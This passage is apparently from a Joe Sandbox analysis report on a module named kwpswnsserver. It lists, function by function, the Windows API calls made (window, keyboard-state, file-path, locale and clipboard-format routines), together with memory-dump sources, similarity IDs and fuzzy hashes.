                                                                  • SetCapture.USER32(?), ref: 6C8B87D0
                                                                  • SendMessageW.USER32(?,00000362,0000E001,00000000), ref: 6C8B88C4
                                                                  • UpdateWindow.USER32(?), ref: 6C8B8950
                                                                  • SendMessageW.USER32(?,00000111,00000000,00000000), ref: 6C8B899F
                                                                  • IsWindow.USER32(?), ref: 6C8B89AB
                                                                  • IsIconic.USER32(?), ref: 6C8B89B6
                                                                  • IsZoomed.USER32(?), ref: 6C8B89C1
                                                                  • IsWindow.USER32(?), ref: 6C8B89DF
                                                                  • UpdateWindow.USER32(?), ref: 6C8B8A3B
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Capture$MessageReleaseSendUpdate$EmptyIconicRectRedrawZoomed
                                                                  • String ID:
                                                                  • API String ID: 2500574155-0
                                                                  • Opcode ID: 648969a2ac5bce63ea60ed2ceade91787b6f705fe597533dedc0f3a6592c95fb
                                                                  • Instruction ID: f6f2e3886cefa45b4705d397b99d6ea1e9b59afc81c1ff1daf52f822ce070a21
                                                                  • Opcode Fuzzy Hash: 648969a2ac5bce63ea60ed2ceade91787b6f705fe597533dedc0f3a6592c95fb
                                                                  • Instruction Fuzzy Hash: E4C1933170022A9FCF159F64CD94A9D3BB5BF49718F14467AEC2AAB791CB30A901CF51
                                                                  Function 6C8A43B7 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 189keyboardCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 6C88AC28: GetParent.USER32(?), ref: 6C88AC32
                                                                  • ScreenToClient.USER32(?,?), ref: 6C8A4444
                                                                  • GetKeyState.USER32(00000001), ref: 6C8A44B5
                                                                  • GetKeyState.USER32(00000001), ref: 6C8A4510
                                                                  • IsWindow.USER32(?), ref: 6C8A45D1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: State$ClientParentScreenWindow
                                                                  • String ID: 0
                                                                  • API String ID: 1527269598-4108050209
                                                                  • Opcode ID: 277a9ae6ceaee3456fced50fe2d77164c9a797ea4722765d923267e1ff829534
                                                                  • Instruction ID: ea9ef469a390fb56c2c94343963e5828b120e2b2b9d515001fe2c9b391d37531
                                                                  • Opcode Fuzzy Hash: 277a9ae6ceaee3456fced50fe2d77164c9a797ea4722765d923267e1ff829534
                                                                  • Instruction Fuzzy Hash: EC61A134B023199FDF249FA4CA84BAD7BB5BFC5318F145A25E815A7A81EF709803CB41
                                                                  Function 6C8C816F Relevance: 10.6, APIs: 7, Instructions: 138fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog3_GS.LIBCMT ref: 6C8C8179
                                                                  • PathIsUNCW.SHLWAPI(?,?,?,?,6C8F9FF2,00000024,?,?,?), ref: 6C8C8229
                                                                  • GetVolumeInformationW.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000,?,6C8F9FF2,00000024,?,?,?), ref: 6C8C824D
                                                                  • GetFullPathNameW.KERNEL32(?,00000104,?,?,00000268,6C8C7FEB,?,?,00000000,?,6C8F9FF2,00000024,?,?,?), ref: 6C8C81AC
                                                                    • Part of subcall function 6C8C812D: GetLastError.KERNEL32(?,?,?,6C8C825E,?,?,?,6C8F9FF2,00000024,?,?,?), ref: 6C8C8139
                                                                    • Part of subcall function 6C8C8062: PathStripToRootW.SHLWAPI(00000000,?,?,6C8F9FF2,00000024,?,?,?), ref: 6C8C8096
                                                                  • CharUpperW.USER32(?,?,6C8F9FF2,00000024,?,?,?), ref: 6C8C827B
                                                                  • FindFirstFileW.KERNEL32(?,?,?,6C8F9FF2,00000024,?,?,?), ref: 6C8C8293
                                                                  • FindClose.KERNEL32(00000000,?,6C8F9FF2,00000024,?,?,?), ref: 6C8C829F
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Path$Find$CharCloseErrorFileFirstFullH_prolog3_InformationLastNameRootStripUpperVolume
                                                                  • String ID:
                                                                  • API String ID: 2323451338-0
                                                                  • Opcode ID: 514db4f91fd772c978e6db8cfea3eea3654b5c064fc0dd372a9594794be4e821
                                                                  • Instruction ID: e3d6ade2cd940c283200a747cbd6317308d3c4c671fbbe23ed8d863e4de6fbb4
                                                                  • Opcode Fuzzy Hash: 514db4f91fd772c978e6db8cfea3eea3654b5c064fc0dd372a9594794be4e821
                                                                  • Instruction Fuzzy Hash: 224199716446156FDB34EB28CD8CAEE737CFF01318F104EAAA459D2A40EB31DD45CA61
                                                                  Function 6C898F4D Relevance: 9.2, APIs: 6, Instructions: 229windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetWindowRect.USER32(?,?), ref: 6C898F9B
                                                                  • EqualRect.USER32(?,00000000), ref: 6C898FB9
                                                                    • Part of subcall function 6C89BDD8: SetWindowPos.USER32(?,00000115,00000000,00000000,00000002,00000002,00000000,?,?,6C89946B,00000000,00000002,00000002,00000000,00000000,00000115), ref: 6C89BE00
                                                                  • IsWindowVisible.USER32(?), ref: 6C899074
                                                                  • CopyRect.USER32(?,?), ref: 6C8990B4
                                                                  • GetParent.USER32(?), ref: 6C899196
                                                                  • SetParent.USER32(?,?), ref: 6C8991AC
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: RectWindow$Parent$CopyEqualVisible
                                                                  • String ID:
                                                                  • API String ID: 3103310903-0
                                                                  • Opcode ID: b25ea2f0e4fd4ecaca7fc28357b43175699a3356c92ab482d27dfd9b03afce8c
                                                                  • Instruction ID: d74294c329b6b72be5661add5b83946534983dae9ff14039e4c6d77bf8a05eef
                                                                  • Opcode Fuzzy Hash: b25ea2f0e4fd4ecaca7fc28357b43175699a3356c92ab482d27dfd9b03afce8c
                                                                  • Instruction Fuzzy Hash: FC81D271641219AFDF289F7CCD88BEA77B9BF44308F1046A9E81ED6690DB349D44CB50
                                                                  Function 6C9E60AA Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetLocaleInfoW.KERNEL32(?,2000000B,6C9E5A7B,00000002,00000000,?,?,?,6C9E5A7B,?,00000000), ref: 6C9E6143
                                                                  • GetLocaleInfoW.KERNEL32(?,20001004,6C9E5A7B,00000002,00000000,?,?,?,6C9E5A7B,?,00000000), ref: 6C9E616C
                                                                  • GetACP.KERNEL32(?,?,6C9E5A7B,?,00000000), ref: 6C9E6181
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: InfoLocale
                                                                  • String ID: ACP$OCP
                                                                  • API String ID: 2299586839-711371036
                                                                  • Opcode ID: 4ac5a8d32bbfe7c116ebddc2b13cff37d5f31561eec4fbdefef11b5103164ce5
                                                                  • Instruction ID: 5d0a7692a64b652d0295157edc70a25303658be4fe3c1bfa2ac116fb668777e2
                                                                  • Opcode Fuzzy Hash: 4ac5a8d32bbfe7c116ebddc2b13cff37d5f31561eec4fbdefef11b5103164ce5
                                                                  • Instruction Fuzzy Hash: AB213872704608E6E7178B1ACD01A8777BAFF6DB5CB1A8524EA09D7A02E732DF41C340
                                                                  Function 6C88462E Relevance: 7.8, APIs: 5, Instructions: 266COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetClientRect.USER32(?,?), ref: 6C884651
                                                                  • InflateRect.USER32(?,?,?), ref: 6C88466D
                                                                  • BeginDeferWindowPos.USER32(?), ref: 6C8846E1
                                                                  • InvalidateRect.USER32(?,00000000,00000001,00000018,00000008,00000000,0000EA20), ref: 6C884750
                                                                  • EndDeferWindowPos.USER32(00000000), ref: 6C88494E
                                                                    • Part of subcall function 6C89BBF7: GetDlgItem.USER32(?,?), ref: 6C89BC08
                                                                    • Part of subcall function 6C88634B: GetClientRect.USER32(?,?), ref: 6C88636D
                                                                    • Part of subcall function 6C88634B: GetParent.USER32(?), ref: 6C886386
                                                                    • Part of subcall function 6C88634B: GetClientRect.USER32(?,?), ref: 6C8863B5
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$Client$DeferWindow$BeginInflateInvalidateItemParent
                                                                  • String ID:
                                                                  • API String ID: 939197390-0
                                                                  • Opcode ID: 3b404d9280d5b6e9c32571fde70868952a747c9c6dd2576293bcb4599c049e90
                                                                  • Instruction ID: 16b4043f9e67a0b35e21e739e46f20f67d53340714f494cf831f66606483e0c9
                                                                  • Opcode Fuzzy Hash: 3b404d9280d5b6e9c32571fde70868952a747c9c6dd2576293bcb4599c049e90
                                                                  • Instruction Fuzzy Hash: ADB12732E01659EFDB28CFA8C990BEDFBB9FF89304F144529E519A7640D730A855CB90
                                                                  Function 6C88835D Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 377COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetWindowRect.USER32(?,?), ref: 6C888664
                                                                    • Part of subcall function 6C89BDD8: SetWindowPos.USER32(?,00000115,00000000,00000000,00000002,00000002,00000000,?,?,6C89946B,00000000,00000002,00000002,00000000,00000000,00000115), ref: 6C89BE00
                                                                  • SetRectEmpty.USER32(?), ref: 6C8886F2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: RectWindow$Empty
                                                                  • String ID: @
                                                                  • API String ID: 650961088-2766056989
                                                                  • Opcode ID: c3cbe7bc87548dd005e0c51eaba6c7a00e7c45f073d305c6fe11a30e61371512
                                                                  • Instruction ID: 1dc66084bfca917344d581547aa772fd77a326aefd79a0b9d733245bba20c4d3
                                                                  • Opcode Fuzzy Hash: c3cbe7bc87548dd005e0c51eaba6c7a00e7c45f073d305c6fe11a30e61371512
                                                                  • Instruction Fuzzy Hash: C2E12771E012199FCB19CFA8DA84AEEBBF5FF48314F14852AE815B7780DB30A941CB54
                                                                  Function 6C8C25C0 Relevance: 6.3, APIs: 4, Instructions: 339keyboardCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 6C89BAAC: GetWindowLongW.USER32(?,000000EC), ref: 6C89BAB9
                                                                  • GetAsyncKeyState.USER32(00000011), ref: 6C8C26CA
                                                                  • GetClientRect.USER32(?,?), ref: 6C8C286C
                                                                  • SetScrollPos.USER32(00000000,00000002,?,00000001), ref: 6C8C295A
                                                                    • Part of subcall function 6C8BF135: GetClientRect.USER32(?,?), ref: 6C8BF16F
                                                                    • Part of subcall function 6C8BF135: InflateRect.USER32(?,00000000,00000000), ref: 6C8BF1A9
                                                                    • Part of subcall function 6C8BF135: SetRectEmpty.USER32(?), ref: 6C8BF24D
                                                                    • Part of subcall function 6C8BF135: SetRectEmpty.USER32(?), ref: 6C8BF25A
                                                                    • Part of subcall function 6C8BF135: GetSystemMetrics.USER32(00000002), ref: 6C8BF27F
                                                                    • Part of subcall function 6C8BF135: EqualRect.USER32(?,?), ref: 6C8BF34C
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$ClientEmpty$AsyncEqualInflateLongMetricsScrollStateSystemWindow
                                                                  • String ID:
                                                                  • API String ID: 3234605627-0
                                                                  • Opcode ID: 1e6f002623c0668ba329507a273fae6fcc9d9c157c6e320fc6f45fe48805c93f
                                                                  • Instruction ID: 84425c15789cf2ed6a89db546154e554f1684a94a43cb859c1973f7c11ff34f2
                                                                  • Opcode Fuzzy Hash: 1e6f002623c0668ba329507a273fae6fcc9d9c157c6e320fc6f45fe48805c93f
                                                                  • Instruction Fuzzy Hash: C9C1F53470121A8BDF299B28C998BBD37B1BF45308F105979D816AB7C5DB78EC45CB82
                                                                  Function 6C8A2F1D Relevance: 6.1, APIs: 4, Instructions: 79windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Parent$H_prolog3Iconic
                                                                  • String ID:
                                                                  • API String ID: 881905488-0
                                                                  • Opcode ID: 6b37bea3d911566ad056f2fd645031a996e5fe7dbc3553dfab122fa0538048be
                                                                  • Instruction ID: aed00c924ed23e1e5f726a22ae00dac025e8ae88e3d1f22e708cd4b16bbff7e2
                                                                  • Opcode Fuzzy Hash: 6b37bea3d911566ad056f2fd645031a996e5fe7dbc3553dfab122fa0538048be
                                                                  • Instruction Fuzzy Hash: B921B032600219ABCF365FA9CE08B9E7B75BF48318F004A24F919D7A50EB35D8169B90
                                                                  Function 6C880EC8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • OutputDebugStringA.KERNEL32(IsolationAware function called after IsolationAwareCleanup,0000007C,?,6C88A657,?,6CA42438,00000010,6C88F6FD,?), ref: 6C880EDC
                                                                  • GetLastError.KERNEL32(6C88F6FD,0000007C,?,6C88A657,?,6CA42438,00000010,6C88F6FD,?), ref: 6C880F13
                                                                    • Part of subcall function 6C8810EA: GetModuleFileNameW.KERNEL32(?,?,00000105,?,6C88A657,?,6CA42438,00000010,6C88F6FD,?), ref: 6C88119A
                                                                    • Part of subcall function 6C8810EA: SetLastError.KERNEL32(0000006F,?,6C88A657,?,6CA42438,00000010,6C88F6FD,?), ref: 6C8811AE
                                                                  Strings
                                                                  • IsolationAware function called after IsolationAwareCleanup, xrefs: 6C880ED7
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$DebugFileModuleNameOutputString
                                                                  • String ID: IsolationAware function called after IsolationAwareCleanup
                                                                  • API String ID: 3265401609-2690750368
                                                                  • Opcode ID: 69ba4682bc6c49d8fd8c873375935f1713b4fd589109f84bf5b6bcee2910692b
                                                                  • Instruction ID: dd9b64f0669acd70bfb905587d5289c2e8a8f409c74998489dc5ed35b035bb8e
                                                                  • Opcode Fuzzy Hash: 69ba4682bc6c49d8fd8c873375935f1713b4fd589109f84bf5b6bcee2910692b
                                                                  • Instruction Fuzzy Hash: 3CF022323173E7874B380AA98F0066B32B4AB1675CB61CD39E911C2F80D730E402C7E0
                                                                  Function 6C88E80E Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Iconic
                                                                  • String ID:
                                                                  • API String ID: 110040809-0
                                                                  • Opcode ID: 1b21dd58b953df3973d59377cd77909a6ee18481124f247295fc4cd18b32c9c9
                                                                  • Instruction ID: d48289f1ed9d9ce7751d6d5348699ae0ff82a8ac7e12113732eae58ba05ea6e9
                                                                  • Opcode Fuzzy Hash: 1b21dd58b953df3973d59377cd77909a6ee18481124f247295fc4cd18b32c9c9
                                                                  • Instruction Fuzzy Hash: 96D0C936159770CBC7355A5AA944BC677A6BB4932AF050929D04681DA0D6E1A891CBC0
                                                                  Function 6C902233 Relevance: 44.1, APIs: 24, Strings: 1, Instructions: 327fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog3_GS.LIBCMT ref: 6C90223D
                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104,6CA37ABC,00000000,6CA37E94,00000000,6CA3528C,00000000,?,?,00000A88,6C9046E9,?,00000000,00000038), ref: 6C9022DC
                                                                  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,6CA3528C,00000000,?,?,00000A88,6C9046E9,?,00000000,00000038), ref: 6C90238F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: File$CreateH_prolog3_ModuleName
                                                                  • String ID:
                                                                  • API String ID: 3408945735-3916222277
                                                                  • Opcode ID: ad4d1cfb20c78f25049a1d9153e724e70e9290b2004e708987e682933d97a7b2
                                                                  • Instruction ID: af835579baceb0d8642cda2fb3675f19da4a72d487b6306ffb3ed7b0cbff9f88
                                                                  • Opcode Fuzzy Hash: ad4d1cfb20c78f25049a1d9153e724e70e9290b2004e708987e682933d97a7b2
                                                                  • Instruction Fuzzy Hash: 10C19F72B00724AFDF249F64CC58FEA77B8AB4A314F1045A9F909E2950DB709E85CF61
                                                                  Function 6C8803CD Relevance: 42.0, APIs: 12, Strings: 12, Instructions: 43registryclipboardCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RegisterClipboardFormatW.USER32(Native), ref: 6C9C15B6
                                                                  • RegisterClipboardFormatW.USER32(OwnerLink), ref: 6C9C15C3
                                                                  • RegisterClipboardFormatW.USER32(ObjectLink), ref: 6C9C15D1
                                                                  • RegisterClipboardFormatW.USER32(Embedded Object), ref: 6C9C15DF
                                                                  • RegisterClipboardFormatW.USER32(Embed Source), ref: 6C9C15ED
                                                                  • RegisterClipboardFormatW.USER32(Link Source), ref: 6C9C15FB
                                                                  • RegisterClipboardFormatW.USER32(Object Descriptor), ref: 6C9C1609
                                                                  • RegisterClipboardFormatW.USER32(Link Source Descriptor), ref: 6C9C1617
                                                                  • RegisterClipboardFormatW.USER32(FileName), ref: 6C9C1625
                                                                  • RegisterClipboardFormatW.USER32(FileNameW), ref: 6C9C1633
                                                                  • RegisterClipboardFormatW.USER32(Rich Text Format), ref: 6C9C1641
                                                                  • RegisterClipboardFormatW.USER32(RichEdit Text and Objects), ref: 6C9C164F
                                                                  Strings
                                                                  Memory Dump Source
